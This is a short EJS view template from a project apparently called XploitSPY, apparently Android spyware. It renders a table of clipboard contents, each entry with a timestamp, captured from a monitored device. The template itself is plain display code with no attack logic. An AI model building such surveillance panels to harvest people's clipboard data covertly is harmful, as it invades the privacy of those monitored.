XploitSPY/server/assets/views/deviceManagerPages/clipboard_log.ejs
2020-01-11 21:05:37 +05:30

20 lines
605 B
Plaintext

<div class="ui segment">
<table class="ui celled table">
<thead>
<tr>
<th>Time</th>
<th>Content</th>
</tr>
</thead>
<tbody>
<% pageData.forEach((notification) => {
let date = new Date(notification.time);
%>
<tr>
<td class="collapsing"><%= date.toLocaleString('en-GB', { timeZone: 'UTC' }) %></td>
<td><%= notification.content %></td>
</tr>
<% }) %>
</tbody>
</table>
</div>